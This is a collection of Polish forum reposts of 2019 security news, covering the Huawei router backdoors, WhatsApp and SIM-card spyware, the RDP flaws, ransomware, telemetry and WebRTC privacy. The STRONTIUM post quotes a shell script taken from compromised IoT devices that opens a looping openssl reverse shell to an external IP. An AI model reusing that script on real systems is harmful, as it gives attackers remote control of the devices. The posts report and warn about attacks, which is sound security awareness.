2019.04.30.02.[PL]-Internet-text- Vodafone zlokalizowało we własnej infrastrukturze backdoory od Huawei

Witam; Przedruk informacji, dosyć ciekawej. W temacie, informatyka – internet – bezpieczeństwo. Ciekawostka, która polecam wszystkim.





Tutaj mamy dość enigmatyczną notatkę w temacie. Zaczyna się dość poważnie:

Europe’s biggest phone company identified hidden backdoors in the software that could have given Huawei unauthorized access to the carrier’s fixed-line network in Italy, a system that provides internet service to millions of homes and businesses

Backdoory miały być wg Bloomberga w dwóch miejscach. Routery domowe:

Vodafone asked Huawei to remove backdoors in home internet routers in 2011 and received assurances from the supplier that the issues were fixed, but further testing revealed that the security vulnerabilities remained, the documents show.

Jak widać z łataniem też nie jest zbyt dobrze…

Gorzej sprawa wygląda z elementami infrastruktury IT:

Vodafone also identified backdoors in parts of its fixed-access network known as optical service nodes, which are responsible for transporting internet traffic over optical fibers, and other parts called broadband network gateways, which handle subscriber authentication and access to the internet, the people said.

Czy były to podatności czy backdoory? Czasem ciężko jest to jednoznacznie stwierdzić. Kiedyś pisaliśmy o tego typu problemie z TP-Linkiem (co było komentowane w świecie). Jeśli podatność daje zdalny dostęp (bez uwierzytelnienia) do systemu i co więcej podatność ta nie występuje w żadnej funkcji dostępnej dla użytkownika – to jak ją nazwać? W przypadku Vodafone może dziwi nieco podejście: „Hej, usuńcie nam te backdoory i będzie OK”.

W każdym razie czekamy na więcej informacji, bo swego czasu Bloomberg również raportował o backdoorze (w komponentach Supermicro), co do tej pory nie miało to dodatkowego potwierdzenia, chociaż odcisnęło pewne ślady na rynku.

:ugeek:

2019.05.16.01.[PL] - text – Cz.04.-Ciekawostka-Informatyka – Telefon…



Przedruk – informacji.

Podatność w WhatsApp – można zwykłą rozmową zainstalować spyware na telefonie ofiary.





Techniczny opis tutaj. Bardziej słowno-muzyczny – tutaj czy tutaj:

Whatsapp has recently patched a severe vulnerability that was being exploited by attackers to remotely install surveillance malware on a few „selected” smartphones by simply calling the targeted phone numbers over Whatsapp audio call.

Czyli samą rozmową na urządzenie (telefon) ofiary można było jej zainstalować spyware. Co więcej to podatność została uzbrojona w spyware przez izraelską firmę NSO Group. Prawdopodobnie można był uzyskać dostęp do kamery, mikrofonu, e-maili, kontaktów, wiadomości… przynajmniej tyle potrafi flagowy produkt firmy NSO Group – Pegasus.

Załatane wersje: WhatsApp for Android: v2.19.134, WhatsApp Business for Android: v2.19.44, WhatsApp for iOS: v2.19.51, WhatsApp Business: v2.19.51.

0-day był ponoć wykorzystany tylko na niewielką liczbę ‚wybranych ofiar’:

Discovered, weaponized and then sold by the Israeli company NSO Group that produces the most advanced mobile spyware on the planet, the WhatsApp exploit installs Pegasus spyware on to Android and iOS devices.

Martwić też może dość wysoka ‚niewidoczność’ samego faktu ataku na nasze urządzenie:

Also, the victim would not be able to find out about the intrusion afterward as the spyware erases the incoming call information from the logs to operate stealthily.

:ugeek:

2019.05.30.03.[PL]-text-Ciekawostka-Poufne dokumenty.



Prawie miliard poufnych dokumentów można było pobrać ze strony First American Financial Corp.





130-letni gigant – First American Financial Corp.- (18 000 pracowników) działający w obszarze nieruchomości, miał gigantyczną podatność. Zmieniając numer ID w pewnym linku, można było uzyskać dostęp do poufnych dokumentów:

The digitized records — including bank account numbers and statements, mortgage and tax records, Social Security numbers, wire transaction receipts, and drivers license images — were available without authentication to anyone with a Web browser.

Wg Briana Krebsa, pierwszy dokument, który można było pobrać datowany były na 2003 rok (ID=000000075). Kolejne numery ID to kolejne dokumenty. Ponoć w ten sposób było dostępnych aż 885,000,000+ dokumentów. Ciężko powiedzieć ile z nich mogło realnie dostać się w niepowołane ręce…

Ot taka ciekawostka, co się dzieje na Świecie; Chodzi o dziedzinę Informatyki, i naszego bezpieczeństwa. Czy jesteśmy „Bezpieczni” ? ? ? Co się dzieje z naszymi danymi, które w zaufaniu podajemy do wiadomości urzędników?

Jak oni nas traktują? Czy jesteśmy tylko śmieciem i odpadem po produkcyjnym? Co mamy do powiedzenia na swoją obronę? Czy w ogóle coś mamy do powiedzenia?Czy żyjemy w Matrix-sie? A wy jakie macie zdanie na ten temat? Co można by było zmienić, ulepszyć, aby zwiększyć nasze bezpieczeństwo? Nie mam na myśli, takiej sztucznej ułudy bezpieczeństwa.

Takiego jak uważa Struś, gdy schowa głowę w piasek. ( taka metafora ).

Realnie co można zrobić w tej materii? Pozdrawiam. :ugeek:

2019.05.31.04.[PL]-text-Windows-Krytyczna podatność, Ciekawostka.



Windows – Sekurak. Krytyczna podatność.

Krytyczna podatność w RDP (CVE-2019-0708) – prawie milion podatnych Windowsów dostępnych jest w Internecie







O problemie pisaliśmy niedawno – w skrócie, bez uwierzytelnienia można wykonać kod w systemie operacyjnym (uprawnienia SYSTEM) poprzez odpowiednio złośliwą komunikację RDP.

Od tego czasu mamy skaner wykrywający podatność (rdpscan), dość szczegółową analizę podatności, a także około miliona maszyn dostępnych bezpośrednio z Internetu, które nie są załatane.

Lepiej się pospieszcie z łataniem, bo następny krok to będzie już tylko armageddon. Podatne są: Windows 7, Windows Server 2008 R2, Windows Server 2008 + starsze XP-ki i Windows 2003 Serwer.





Ot taka sobie ciekawostka, na temat windy, i jej pochodnych. Takie teksty to jest niemal codzienność. To powinno zmusić do myślenia, a może nie? Jest tego tak dużo, że gdybym chciał wszystkie te przypadłości pokazać? To trzeba by było nowe forum założyć. Zresztą jak ktoś się tym interesuje, to polecam forum – Sekuraka. Jest tego tam całe mnóstwo, i to całkiem świeże. Codziennie, jest coś nowego. Winda, prowadzi zasłużone pierwsze miejsce. Warto wiedzieć, na jakiego konia się obstawia ten wyścig. Który z góry jest skazany na przegraną.

Ot, dodam jeszcze jedną ciekawostkę; Chiny zamierzają w odwecie za „Huawei”- Zrezygnować z windy, i mikro…u. Jak to wprowadzą To pastuchy, się chyba zesrają. Rosja, już to zrobiła; we wszystkich urzędach, policja,+ wojsko. Jak teraz Chińczyki dołączą do spisku? To trochę rynek im się skurczy.

Pozdrawiam.

Sodin – nowy ransomware wykorzystuje podatność w Windows w celu eskalacji uprawnień



Witam; ciekawostka, która powinna zaciekawić wszystkich internautów. Jest to przedruk.

Badacze z Kaspersky Lab informują o wykryciu nowego ransomware o nazwie Sodin. Tradycyjnie szyfruje pliki i żąda okupu za odszyfrowanie (płacenie nie jest zalecane, bo w ten sposób wspieramy przestępców). Wszystko wskazuje na to, że malware rozprowadzane jest jako usługa w modulu RaaS.

Sodin korzysta z podatności CVE-2018-8453, która pozwala na zwiększenie uprawnień. Przestępcy wyszukiwali (prawdopodobnie za pomocą wyszukiwarek typu Shodan, ale w informacji nie jest to wyjaśnione) podatne systemy, którym ochronę zapewniał antywirus Webroot, po czym wykonywali polecenie (za pomocą droppera, czyli “malware pobierającego inne malware”) pobrania pliku radm.exe, a więc opisywanego zagrożenia.

Ciekawa jest technika dot. architektury procesora zastosowana w Sodinie:

Wykrycie szkodnika Sodin utrudnia dodatkowo wykorzystywanie przez niego techniki „Heaven’s Gate”. Pozwala ona szkodnikowi wykonać kod 64-bitowy z procesu 32-bitowego, co nie jest powszechną praktyką i nieczęsto występuje w oprogramowaniu ransomware.

Pewien użytkownik Reddita napisał, że atakujący uzyskuje dostęp do maszyny poprzez protokół RDP, zwiększa uprawnienia, dezaktywuje antywirusa i kopie zapasowe, a następnie pobiera Sodina. Malware zostało zauważone głównie w Azji (Tajwan, Hongkong, Korea Południowa). Nie oznacza to jednak, że użytkownicy systemu Windows na innych kontynentach mogą czuć się bezpiecznie.

Standardowo przede wszystkim należy pamiętać o regularnym wykonywaniu kopii zapasowych. Pozdrawiam. :ugeek:

2019.07.16.02.-text- Office 365 nielegalny w Niemczech?



Office 365 nielegalny w Niemczech? Tak – przynajmniej w części szkół. Obawy o poufność…





Co może być podejrzanego w Microsoft Office 365? Wymieniane są głównie trzy rzeczy:

Zapisywanie danych w chmurze, która fizycznie znajduje się poza terytorium UE (choć wg RODO czy GDPR wcale tak nie musi być) – w tym chodzi tu o takie „kwiatki” (wysyłka dokumentów Worda, które są konwertowane na PDF do chmury (!?!)). Można się też zastanawiać gdzie w tej sytuacji wysyłany jest nasz głos (automatyczne tłumaczenie naszego głosu przez PowerPoint)

Wysyłanie danych telemetrycznych (również tych z Office)

Dostęp urzędników amerykańskich (w tym należących do pewnych służb…) do zasobów chmurowych (niezależnie czy zlokalizowane są one w EU czy nie)

Kilka tego typu problemów zostało właśnie opisanych w oświadczeniu heskiego komisarza ds. Ochrony danych i wolności informacji na temat korzystania z usługi Microsoft Office 365 w szkołach Hesji:

Użycie Office 365 w szkołach jest nielegalnie, jeśli szkoły przechowują dane osobowe w europejskiej chmurze.

Pojawiają się komentarze, że nie jest próba wyrugowania Microsoftu, ale raczej zmuszenia go do większej uległości w kontekście ochrony danych. W szczególności chmura europejska niech sobie będzie, ale Niemcy chcą lokalizacji danych użytkowników Office we własnym kraju. Obecnie wygląda to mniej więcej tak:

Nie milkną też zastrzeżenia w temacie telemetrii. Niby centra danych są w UE, ale centra danych telemetrii…a to już inna sprawa. Przecież telemetria nie operuje na wrażliwych danych, czy danych osobowych, prawda? Nie prawda. Niedawno mogliśmy poczytać o aferze dotyczącej m.in. wysyłania fragmentów maili czy zdań z dokumentów na serwery Microsoftu:

Investigators admitted that Microsoft collected functional and diagnostics data that is usually a standard practice among software developers, but they also found that Office applications also collected actual content from users’ applications, such as email subject lines and sentences from documents where the company’s translation or spellchecker tools were used.

W obecnym oświadczeniu ponownie został wskazany ten wątek [© Google Translator]:

Dzięki systemowi operacyjnemu Windows 10 bogactwo danych telemetrycznych jest przesyłane do firmy Microsoft, której treść nie została ostatecznie wyjaśniona pomimo wielokrotnych zapytań w firmie Microsoft. Takie dane są również przesyłane podczas korzystania z usługi Office 365.

Microsoft dziękuje niemieckiemu komisarzowi, pisząc że prywatność jest ważna i linkując swoje standardowe bla bla bla. Tymczasem nie udostępnia prostego narzędzia umożliwiającego dokładne kontrolowanie danych wysyłanych w ramach telemetrii czy innych działań. Ba, wręcz na domyślnej instalacji Office widzimy takie kwiatki (zauważcie poniżej wyszarzony checkbox – normalnie nie ma możliwości jego odznaczenia):Diagnostyka…

Dane diagnostyczne są używane do zapewnienia bezpieczeństwa i aktualizacji pakietu Office, rozwiązania problemów oraz wprowadzenia ulepszeń produktu

( w organizacji tę preferencję może skonfigurować administrator ).



Wysyłaj pełne dane diagnostyczne; Udostępniaj informacje dotyczące sposobu

użycia aplikacji, funkcji i urządzeń. Mogą to być podstawowe dane diagnostyczne i rozszerzone raportowania błędów.



Jednocześnie w pośpiechu Microsoft uruchamia z końcem 2019 Office-owe data center w Niemczech. Choć niedawno je zamknął…

–Michał Sajdak.

Tekst został, skopiowany i powielony; miłej lektury. Pozdrawiam. :ugeek:

Witam; Posyłam taką ciekawostkę; dotyczy ona bezpieczeństwa, w internecie. Nie rozważny krok, czyli klikamy; i mamy zaszyfrowane pliki, chcą okupu. Aby odszyfrować. A czy odszyfrują? Tego już nikt nie wie. Tak działa winda, taka jej specyfika, i urok. Tego gów-a - jest więcej. Klientela windy jest łatwą zdobyczą. Ten system to umożliwia; Pozdrawiam, ku przestrodze.

Ta miła pani rozsyła swoje CV, następnie „szyfruje” Twoje pliki samymi zerami i żąda okupu



Dość intensywna kampania startująca od maili phishingowych, wyglądających jak normalne zgłoszenie chęci do pracy:



W mailu mamy normalny plik .jpg: Jest to zdjęcie ładnej, atrakcyjnej kobiety.



CV… Plus już mniej normalny plik .zip , zawierający windowsowy .lnk. Po jego uruchomieniu następuje nieodwracalne „szyfrowanie” plików poprzez nadpisanie ich zerami oraz prośba o wpłacenie okupu. W skrócie cały proces wygląda tak.

Pamiętajcie, piękne panie to… coś na co trzeba uważać

Pozdrawiam. :ugeek:

2019.08.07.01.[PL]-text- Informatyka-Ciekawostka-Czarny humor.



Witam; Ciekawe i śmieszne. Ale bardzo realne. No może nie w naszym świecie, wiedzy o informatyce, ale to jest bardzo prawdopodobne. Jest to bardzo prawdopodobny scenariusz. Można by o tym zrobić film. Pozdrawiam. :ugeek:



Siergiej ruszaj dupę!!! Kliknęli w linka, wbijaj się bistro na tę drukarkę i jedziemy dalej!





Zapowiadał się kolejny spokojny wieczór. Mały pokój w jednym z moskiewskich biur, z porozwalanymi pudełkami po pizzy i rozrzuconymi niemal wszędzie butelkami po wyśmienitym napoju Bajkał.

– Te Wowa, widziałeś te nowe dumpy 0-dayów na IoT z chińskich forów? Centrala podrzuciła dzisiaj na to namiary.

– No… widziałem. TP-Linki, routerki ASUS-a, masa kamer, drukarki, nagrywarki wideo, nawet jakieś exploiciki na zabawki. Chinole się nie pierdzielą tylko udostępniają tego na potęgę. Pełne exploity a nie jakieś PoC-e. Aż dziw bierze, że te łośki zza oceanu jeszcze niczego z tym nie zrobili. Coś tam próbowali wprowadzać ustawy czy coś ale się rozeszło hehehe. Ustawą wymóc bezpieczeństwo? buahahaha spuentował śmiechem Wowa.

– No to są jaja, co my tu mamy… zahardkodowane backdoorowe konta, o a tu port debug gdzie można dostać się na roocika. Serial z dostępem na roota bez hasła. E, to słabe bo trzeba mieć fizyczny dostęp. O, a tu wydobyli kluczyk krypto z EEPROMA, haha. Gulp, gulp, Siergiej przepił smakowite exploitowe kąski Bajkałem.

– Hej! Patrz co się dzieje! Kliknęli!

– Co?

Butelka Siergieja poleciała na klawiaturę.

– Co ty wyrabiasz! Wszystko w tym słodkim syfie. Zapylaj po backup a ja jadę! Wykrzyknął Wowa.

Tydzień wcześniej grupa STRONT dostała z reconu trochę informacji o wewnętrznej adresacji jednego z amerykańskich szpitali realizujących program badawczy. Ponoć dla wojska; z pewnością warto sprawdzić ten wątek.

Hmm dobra nasza poszedł jeden CSRF na jedną z ich drukarek – pomyślał Wowa. Taaa domyślne hasełka. Dobra wbijam.

– Sieeeeergieeej ruszaj dupę. Dawaj tego exploita na drukarki HP. Mam tam webowego admina, ale chcę mieć roota!!!

– Yyyhhhaahhh, noo… Już.

[ 10 minut później ]

– Jesteśmy. Cholera kernel 2.4, łooo zrzucaj pamięć i konfiga ile się da. Ja skanuję sieć.

– Dawaj na początek tcpdumpa, zostawi mniej śladu. Łap statyczną binarkę.

– Dzięki, puszczam. C&C gotowe?

– Chwila… dawaj, gotowe. Pamiętaj żeby przepuścić to zaszyfrowane.

– Leci.

[ 5 minut później ]

– Co tam mamy? Domyślne community stringi, trochę XP-ków, oooo niezabezpieczony OSPF. Dawaj skrypty scapy, spróbuję sprawdzić czy da się wstrzyknąć parę pakietów żeby przekonfigurować tablicę routingu. Poszukasz jakiejś maszyny przez, którą przepuścimy ruch? Ta drukarka może nam kipnąć jak zalejemy ją ruchem zebranym z całej sieci!

– Dobra, obadam te XP-ki. Jak mają RDP to może zadziała Bluekeep. Tydzień temu przejęliśmy tym pół sieci, centrala ma łepskich gości, exploit działa jak złoto!

[ 30 minut później ]

– Cholera, prawie zero zabezpieczeń, jak oni o robią? Mamy puszczony ruch przez tego XP-ka. To jakiś system do obróbki zdjęć rentgenowskich, chyba nie dali do tej maszyny nowszych drajwerów niż do XP-ka.

– Ile mamy maszynek?

– Kilka telefonów, rekorder wideo, dwie drukarki, parę Windowsów.

– Wszystko w jednej podsieci czy w osobnych?

– No tu jest tylko jedna sieć, łamago!

– Dobra, bierzmy na cel tego hosta med-arpa-data. Coś tam mamy?

– Wszystko popatchowane, dostępne tylko dwa porty – 80, 443. Dupa.

– Jaka dupa? Dawaj delikatnie ettercapa, ja włączam tcpdumpa i zobaczymy.

[ godzinę później ]

– Łooooosz, na arpa-data zalogował się admin.

– http / https?

Mina Siergieja popijającego z ukontentowaniem szklaneczkę Bajkału mówiła wszystko.

– Noevilshallpass!

– Hehe, nie wierzę, http!?

– Skup się, mamy admina, dumpujemy dane, czyścimy i znikamy

– Czyścimy? może coś sobie zostawmy…?

***

To lekko podkolorowana historia, którą właśnie opisuje ekipa Microsoft Threat Intelligence Center. Tym razem na wrogich działaniach przyłapana została grupa o kodowej nazwie STRONT, mapowana na jedną z rosyjskich jednostek APT:

80% of STRONTIUM attacks have largely targeted organizations in the following sectors: government, IT, military, defense, medicine, education, and engineering. We have also observed and notified STRONTIUM attacks against Olympic organizing committees, anti-doping agencies, and the hospitality industry.

Co dokładniej się stało? Więcej macie w tekście powyżej A Microsoft relacjonuje to w ten sposób, kładąc szczególny nacisk na wykorzystanie problemów w podatnych urządzeniach IoT:

(…) research uncovered attempts by the actor to compromise popular IoT devices (a VOIP phone, an office printer, and a video decoder) across multiple customer locations. The investigation uncovered that an actor had used these devices to gain initial access to corporate networks. In two of the cases, the passwords for the devices were deployed without changing the default manufacturer’s passwords and in the third instance the latest security update had not been applied to the device.

I dalej:

These devices became points of ingress from which the actor established a presence on the network and continued looking for further access. Once the actor had successfully established access to the network, a simple network scan to look for other insecure devices allowed them to discover and move across the network in search of higher-privileged accounts that would grant access to higher-value data. After gaining access to each of the IoT devices, the actor ran tcpdump to sniff network traffic on local subnets.

Na deser jeszcze jeden ze skryptów zlokalizowanych na zaatakowanych urządzeniach IoT:

—contents of [IOT Device] file-- #!/bin/sh export [IOT Device] ="-qws -display :1 -nomouse" echo 1|tee /tmp/.c;sh -c ‘(until (sh -c “openssl s_client -quiet -host 167.114.153.55 -port 443 |while : ; do sh && break; done| openssl s_client -quiet -host 167.114.153.55 -port 443”); do (sleep 10 && cn=$((cat /tmp/.c+1)) && echo $cn|tee /tmp.c && if [ $cn -ge 30 ]; then (rm /tmp/.c;pkill -f ‘openssl’); fi);done)&’ & --end contents of file–

2019.08.14.01.[PL]-tekst- Krytyczne podatności w windowsowym Remote Desktop Services. Witam; Ciekawostka z branży informatycznej, może was zaciekawi. A jeśli nie, to przynajmniej będziecie wiedzieli, że coś takiego istnieje. Pozdrawiam.



Krytyczne podatności w windowsowym Remote Desktop Services – można zdalnie, bez uwierzytelnienia przejmować komputery (dostęp na admina)





Podatności w Remote Desktop Services Microsoft opisuje tutaj:

CVE-2019-1181,

CVE-2019-1182,

CVE-2019-1222,

CVE-2019-1226.

Nie owijając zbytnio w bawełnę:

W RDP jest podatność klasy RCE, którą można wykorzystać bez uwierzytelnienia przez przesłanie odpowiednio złośliwej komunikacji. Podatność nie wymaga interakcji ofiary, a atakujący może wykonywać dowolne polecenia na docelowym systemie, łącznie z tworzeniem kont z pełnymi uprawnieniami.

A remote code execution vulnerability exists in Remote Desktop Services – formerly known as Terminal Services – when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests. This vulnerability is pre-authentication and requires no user interaction. An attacker who successfully exploited this vulnerability could execute arbitrary code on the target system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.

Jak widać, podatne są systemy klienckie od Windows 7 (również 8 oraz 10), oraz edycje serwerowe (od 2008 serwer). Sam Microsoft uczciwie dodaje że możliwe jest stworzenie samoistnie propagującego się robaka:

Like the previously-fixed ‘BlueKeep’ vulnerability (CVE-2019-0708), these two vulnerabilities are also ‘wormable’, meaning that any future malware that exploits these could propagate from vulnerable computer to vulnerable computer without user interaction.

Polecamy skrupulatne załatanie swoich systemów, zanim ktoś przygotuje bojowego exploita, umożliwiającego automatyczną propagację.

:ugeek:

2019.09.12.01.[PL]-text-Backdor-na kartach SIM.

Backdoor na kartach SIM był/jest używany do szpiegowania przez ostatnie 2 lata. Atak jest niezależny od telefonu!



Tak twierdzi firma AdaptiveMobile Security, a atak opiera się na specjalnym oprogramowaniu wgranym na pewne karty SIM. Jak może niektórzy wiedzą, karta SIM to nie takie całkiem głupie urządzenie – posiada bowiem całkiem sporo pamięci i prosty procesor. Można tam wgrać zatem oprogramowanie – np. S@T Browser, który jest (był/jest) używany do celów diagnostycznych. Zacytujmy obszerniejszy fragment:

This S@T Browser software is not well known, is quite old, and its initial purpose was to enable services such as getting your account balance through the SIM card. Globally, its function has been mostly superseded by other technologies, and its specification has not been updated since 2009, however, like many legacy technologies it is still been used while remaining in the background. In this case we have observed the S@T protocol being used by mobile operators in at least 30 countries whose cumulative population adds up to over a billion people, so a sizable amount of people are potentially affected.

Jak całość działa? Prosto – atakujący wysyła do ofiary SMS-a, a zwrotnie dostaje informację o geolokalizacji ofiary. Co ciekawe ofiara nie widzi SMS-a, który „zaatakował”:



Atak

Martwić też może fakt, że wg badaczy taki exploit to nie teoria, ale praktyka używana bojowo od dłuższego czasu:

We are quite confident that this exploit has been developed by a specific private company that works with governments to monitor individuals.

Co więcej potrafi tajemnicze oprogramowanie? Otworzyć stronę w przeglądarce telefonu (np. z exploitem), wysłać SMS-a w imieniu ofiary, wykonać połączenie telefoniczne w imieniu ofiary. Całość jest też niezależna od marki telefonu:

We have observed devices from nearly every manufacturer being successfully targeted to retrieve location: Apple, ZTE, Motorola, Samsung, Google, Huawei, and even IoT devices with SIM cards.

Mało zabawnie.

:ugeek:

2019.09.20.01.[PL]-Informatyka-text-Telewizory kontaktują się z Netflixem.





Telewizory kontaktują się z Netflixem nawet jeśli nie mamy tam konta. Oraz inne ciekawe dane.

Które zostają wysłane do netu.





Były tam telewizory, dongle do telewizorów, kamery, suszarki do ubrań, dzwonki, pralki, żarówki czy asystenci głosowi – wszystko bardzo inteligentne i wysyłające dane do Internetu (w sumie 81 urządzeń umieszczonych w labie znajdującym się w UK oraz osobnym w US). To właśnie komunikacja sprzętu IoT z zewnętrznymi urządzeniami była przedmiotem badania. Miejsca docelowo podzielono na trzy grupy:

System dostawcy (np. Samsung TV łączy się z serwerem Samsunga)

System wspomagający (np. amazonowy CDN). Dalej oznaczony jako Support.

Zupełnie zewnętrzna firma (np. Netflix, Facebook czy coś co trackuje naszą lokalizację czy zbiera o nas interesujące dane). Dalej oznaczona jako Third.

Poniżej pierwsze zestawienie (w podziale na urządzenie nie działa – np. wyłączony telewizor).

Experiment / Party / -US / -UK

Idle / Support / -40/ -38

Third / -4 / -3

Control / Support / -85 / -82

Third / -7 / -4

Power / Support / -39/ - 39

Third/ -4 / -3

Voice / Support/ -8 / -10

Third/ -0 / - 0

Video / Support / -34 / -29

Third/ -0 / -0

Total / Support/ -98/ - 87

Third / -7 / - 5

Zestawienie;

Jak widać z pierwszych dwóch wierszy, mamy w sumie 44 miejsca do których kontaktowały się urządzenia w trybie ‚Idle’. Choć tylko 4 lokalizacje były zupełnie niezwiązane z producentem. Można też zaobserwować, niewielką różnicę (na korzyść UK) w liczbie miejsc, do których wysyłane są dane. Badacze sugerują, że może to mieć związek z nieco bardziej restrykcyjnym prawem w UK.

Dalej mamy zestawienie firm, do których następuje komunikacja:



Domain / us / uk

Amazon / 31 / 24

Google / 14 / 9

Akamai / 10 / 6

Microsoft / 6 / 4

Netfix / 4 / 2

Kingsoft / 3 / 3

21Vianet / 3 / 3

Alibaba / 3 / 4

Beijing Huaxiay/ 3 / 3

AT&T / 2 / 0



Zaskakujący może być fakt, że telewizory wysyłały całą paczkę danych do Netfliksa, mimo że nie skonfigurowano na nich netfliksowego konta:

Nearly all TV devices in our testbeds contacts Netflix even though we never configured any TV with a Netflix account. This, at the very least, exposes information to Netflix about the model of TV at a given location.

Pozytywnie zaskakujące jest to, że duża ilość danych była szyfrowana (choć niektórzy mogą kręcić nosem – co mi z tego że szyfrują moje poufne dane przed wysłaniem do siebie; trudniej będzie mi taki fakt namierzyć!):

We found limited identifiable content, and even less PII, in unencrypted traffic. This is good news, particularly compared with prior work that identified substantial amounts of PII exposed in plaintext in other contexts (e.g., mobile apps and web sites [25, 37]). Nonetheless, we found notable cases of PII exposure. This included various forms of unique identifiers (MAC address3 , UUID, device ID), geolocation at the state/city level, and user specified/related device name (e.g., John Doe’s Roku TV). A notable case that we found in our US lab is the Samsung Fridge sending MAC addresses unencrypted to an EC2 domain, which is a support party in the best case. The implication is that it is now possible for an ISP to track this device.

Badacze całość podsumowują wskazując właśnie szyfrowanie (jako pozytywny aspekt), podkreślając jednak że sporo danych „wylatuje” na zupełnie niezwiązane z producentem serwery, które często znajdują się też w całkiem innej lokalizacji niż region, w którym używamy sprzęt.

We observe several promising practices: most of the devices use encryption or other encodings that protect users’ PII, thus resulting in an overall minimal PII exposure in plaintext. However, even if the traffic is encrypted and without relying on MITM or any kind of IoT device modification, our analysis identifies notable cases of information exposure: 57.45 % (50.27 %) of the overall destinations contacted by the US (UK) IoT devices are third or support parties, and 56 % of the US devices and the 83.8 % of the UK devices contact destinations outside their region.

Komentarz; Jak to dobrze mieć internet w telewizorze. Oraz we wszystkich innych elementach wyposażenia, domu, mieszkania. Jakby do tego dołożyć czip w naszej dupie; to już byłby komplet.

Ale ten czip jest doskonale zastępowany smartfonem i telefonem. Kiedyś, dawno temu, oglądałem taki fantastyczny film. Głównego bohatera, pomyłkowo, albo i nie, zbanowali, skasowali go całkowicie. Od tak po prostu przestał istnieć. Do mieszkania nie mógł wejść, ( wylądował na ulicy )nie mógł nic kupić, żadnego jedzenia, pomimo że miał na koncie kupę kasy. W jednym momencie stał się żebrakiem. Żadnej autoryzacji nie przechodził. Czyli wypadł za burtę, na środku Atlantyku. Dosłownie i w przenośni. To był bardzo stary film, i pewne sprawy były jeszcze tam trochę nie doskonałe. Niedopracowane. Nie to co dzisiaj. To trochę daje do myślenia, ( dotyczy tylko tych co jeszcze myślą ).Jak się przed tym bronić? I co można zrobić, aby ocalić głowę?

Pozdr. :ugeek:

Witam; ot taka znowu ciekawostka z serii, bezpieczny telefon. Czy aby na pewno bezpieczny? I co mogą nam zrobić? Pytanie retoryczne tylko dla przypomnienia jak mocno jesteśmy uzależnieni od tego paskudztwa. Tak długo, jak był on prosty i służył tylko do rozmowy; To można było w słuchawce usłyszeć - Rozmowa kontrolowana- . Stare dobre czasy, które już bezpowrotnie przeminęły. Wtedy narzekaliśmy, że dzieje się nam krzywda. A teraz milczymy, jak owce idące do rzeźni. Taka zmiana dziejowa i historyczna. A teraz już ona nie jest kontrolowana, ale cała osoba jest pod szczególną kontrolą. Już gdzieś tam pisałem , jest to znak czasu, znak bestii. W naszym życiu powszechnym, już się tak stało, że szpiegowanie, kontrolowanie, podglądanie to już jest norma i nikt nie zwraca na to uwagi; A powinien.

Czasy się zmieniają i mamy coraz większą kontrolę. A my przechodzimy obok tego obojętnie. Pytanie; DLACZEGO? Co sprawiło, że nam rozum odebrało? Kim są Ci co to nam robią? Dlaczego się nie bronimy przed tym? Dlaczego tak mocno jesteśmy bezsilni i bezradni? Czy naprawdę nam nie zależy już na niczym?



Podatność w WhatsApp – można złośliwym gifem przejąć dane ofiary. A to już jest pełna kontrola, nad nami. Dostępny jest exploit.







Podatność została załatana we wrześniu 2019r. w wersji 2.19.244 WhatsAppa na Androida. Błąd jest klasy double-free i można z jego wykorzystaniem uzyskać RCE (remote code execution) na systemie Android. Całość polega na dostarczeniu odpowiednio spreparowanego pliku .gif do ofiary. Po udanym wykorzystaniu buga można uzyskać dostęp do bazy wiadomości ofiary.

Aby exploit był w pełni uzbrojony musi być połączony z innym bugiem, autor znaleziska podsumowuje to tak:

Remote code execution: Pairing with an application that has an remote memory information disclosure vulnerability (e.g. browser), the attacker can collect the addresses of zygote libraries and craft a malicious GIF file to send it to the user via WhatsApp (must be as an attachment, not as an image through Gallery Picker). When the user opens the Gallery view in WhatsApp, the GIF file will trigger a remote shell in WhatsApp context.

Local privilege escalation (from a user app to WhatsApp): A malicious app is installed on the Android device. The app collects addresses of zygote libraries and generates a malicious GIF file that results in code execution in WhatsApp context. This allows the malware app to steal files in WhatsApp sandbox including message database.

Czyli albo najpierw atakujący namierza stosowne adresy w telefonie ofiary za pomocą np. buga w przeglądarce i generuje odpowiedniego .gifa lub ofiara ma zainstalowaną złośliwą aplikację, która pobiera ten sam adres i ponownie generuje gifa.

Exploit działa wg badacza na Androidy 8.1 and 9.0.

Patrząc na odpis podatności, łącząc kilka exploitów można by również przejąć dostęp nad całym telefonem (dostęp root). Łańcuch exploitów wyglądałby następująco:

Bug umożliwiający poznanie stosownych adresów na telefonie ofiary

Opisywany Bug w WhatsAppie (RCE)

Eskalacja uprawnień do root

Łatajcie WhatsAppa (oraz Androida).

Pozdrawiam; :ugeek:

2019.10.18.02.[PL]-text-Prywatność w przeglądarce.



Dbasz o prywatność? Rozważ wyłączenie WebRTC w przeglądarce



Ciekawe wycieki z Twojej przeglądarki można zobaczyć np. tutaj: https://browserleaks.com/ip – sprawdźcie też inne kategorie na tej stronie!

WebRTC w kontekście prywatności opisany został w tym artykule, a skutki jego stosowania w przeglądarkach tutaj. W skrócie: ta technologia pozwala na bezpośrednią komunikację pomiędzy przeglądarkami, a przy okazji może ujawnić nasz prawdziwy, publiczny adres IP (czasami pomimo VPN) czasami również adres lokalny. Właśnie z tego powodu WebRTC powinien być wyłączony. Instrukcje dla najpopularniejszych przeglądarek zostały podane poniżej.

Mozilla Firefox

W pasku adresu wpisujemy about:config. Z tego miejsca możemy zarządzać wszystkimi “niskopoziomowymi” ustawieniami przeglądarki. Akceptujemy ryzyko “Groźby utraty gwarancji” i wyszukujemy w polu na górze strony media.peerconnection.enabled. Domyślną wartością jest true. Po dwukrotnym kliknięciu na wyniku wyszukiwania wartość zostanie ustawiona na false, a WebRTC wyłączony.



FF

Google Chrome

W Chrome wystarczy pobrać plugin – np. WebRTC Network Limiter. Działa on domyślnie w tle, z ustawieniem “Use my default public and private IP addresses”. Zmiana tej opcji poprzez kliknięcie prawym przyciskiem myszy na ikonę pluginu w prawym górnym rogu przeglądarki.

Opera

Przechodzimy do ustawień (najszybszy sposób to wpisanie about:config w pasku adresu). Klikamy strzałkę obok opcji Zaawansowane w menu po lewej stronie. Następnie wybieramy Prywatność i bezpieczeństwo, po czym w sekcji WebRTC zaznaczamy Wyłącz UDP bez proxy (powyżej znajduje się opcją włączająca “VPN” w Operze, ale to raczej zwykłe proxy, bez szyfrowania).

:ugeek: